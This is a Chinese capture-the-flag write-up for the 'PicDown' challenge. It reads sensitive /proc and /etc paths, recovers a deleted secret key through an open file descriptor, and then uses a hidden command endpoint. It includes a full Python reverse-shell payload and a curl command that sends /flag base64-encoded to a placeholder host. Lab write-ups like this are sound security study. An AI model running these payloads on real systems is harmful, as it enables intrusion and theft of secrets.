[网鼎杯 2020 白虎组]PicDown1 [反弹shell] [敏感文件路径] [文件描述符]

news2025/4/21 9:51:56

常见读取路径

/etc/passwd=====一些用户和权限还有一些乱七八糟的

/proc/self/cmdline=====包含用于开始当前进程的命令

/proc/self/cwd/app.py======当前工作目录的app.py

/proc/self/environ=====包含了可用进程的环境变量

/proc/pid/exe =====包含了正在进程中运行的程序链接；
/proc/pid/fd/ =====这个目录包含了进程打开的每一个文件的链接；
/proc/pid/mem =====包含了进程在内存中的内容；
/proc/pid/stat =====包含了进程的状态信息；
/proc/pid/statm =====包含了进程的内存使用信息。

非预期解：url=/flag 出flag

网站功能：

<html>
<meta http-equiv="refresh" content="0;url=http://www.baidu.com/">
</html>

网站功能：刷新界面并跳转到百度

读取passwd

读取环境变量

/proc/self/environ

self位置为PID：代表进程 ID（Process ID），是系统为每个正在运行的进程分配的唯一标识符

若一个进程的 ID 是 1234，那么该进程的相关信息就存储在 /proc/1234 目录下

环境变量里面的 PWD=/app 这里告诉我们这是在/app目录下进行的

该环境变量表示 当前工作目录（Present Working Directory），即进程所在的文件系统路径。

/app 是当前进程的根目录或应用程序的主目录（常见于容器化环境，如 Docker）。

当用户在终端中执行命令时，默认操作路径即 PWD 的值。

读取启动当前进程的完整命令

/proc/self/cmdline

读取app.py文件：

/proc/self/cwd/app.py

cwd 代表 “Current Working Directory”（当前工作目录）

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

补充一点urllib的知识

python2中urllib的urlopen可以直接通过文件路径读取文件

漏洞所在处

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)

文件描述符未关闭：代码打开文件后未显式关闭，导致文件描述符在os.remove()时可能仍处于打开状态。

已删除文件的可读性：在Unix系统中，若文件被删除但有进程仍持有其文件描述符，可通过/proc访问该描述符读取内容。

正常情况下应该是用f.close()
或者用with语句自动实现文件描述符的关闭
如：

with open(SECRET_FILE) as f:
    SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)  # 确保在文件关闭后删除

关于文件描述符

文件描述符是什么：

文件描述符（File Descriptor）是操作系统分配给已打开文件的“临时编号”（类似你去银行办事时拿到的排队号码）。程序通过这个编号操作文件（读/写）。

文件描述符未关闭会发生什么：

当一个程序（如 Python 脚本）打开了一个文件（如 open("/tmp/secret.txt")），但未显式调用 f.close() 或未使用 with 语句自动关闭文件时，操作系统会认为该文件仍被占用（仍然在使用中）。此时，即使代码中调用了 os.remove(SECRET_FILE) 删除了文件，实际文件内容仍可能通过未关闭的文件描述符被读取到（其内容仍会残留在磁盘上）。

我们可以通过访问/proc/self/fd/<文件描述符>来访问某个特定的文件

怎么获取这次的文件描述符：

。。。枚举

获取key

/proc/self/fd/3

fd为文件描述符（file descriptors）

输入key并执行命令，但是没有回显，此时考虑到反弹shell

第一种解法：python反弹shell

注意：这里的key和shell需要经过url编码！因为key中会存在+/=等符号，需要编码后才行

编码前

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0=

&shell=python -c 

'import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("xxxxxxxxx",8888));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/sh","-i"]);'

编码后

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D
&shell=python%20%2Dc%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22xx%2Exxx%2Exxx%2Exx%22%2C8888%29%29%3Bos%2Edup2%28s%2Efileno%28%29%2C0%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C1%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C2%29%3Bp%3Dsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%29%3B%27

腾讯云服务器的一些问题

第一次整服务器遇到一些困扰我的问题，浅写一下这次是怎么解决的：

问题一：端口是4567或者3333在bp中发送请求的时候一直不行，半天没回应

换成8888，我也不知道为啥我这只有8888能成功。。。明明其他端口的防火墙都放开了。。

问题二：如图，是困扰我最久的一个

8888端口已经被占用了，一查还是宝塔面板占用的，你要是把它kill掉吧，你的宝塔面板一转头又有新的进程了，怎么杀都杀不死

杀不死咱就绕过嘛嘿嘿，宝塔面板默认端口是8888，把它改成其他的

然后8888就能正常监听啦

问题三：怎么结束监听

无意间摁了个 control+C 然后自己结束了。。?

踏马的，终于反弹出来了，终于看到这个Connection received了。遥想当年青龙组那道note题反弹了一个星期都没反弹个p出来，激动的要掉小珍珠了

第二种解法：curl反弹shell

注意还是要编码还要base64编码输出，不编码就输出不出来（为啥）

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D&shell=curl%20xxxx:8888/`cat%20/flag|base64`

命令自己改

本题总结：

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2322016.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！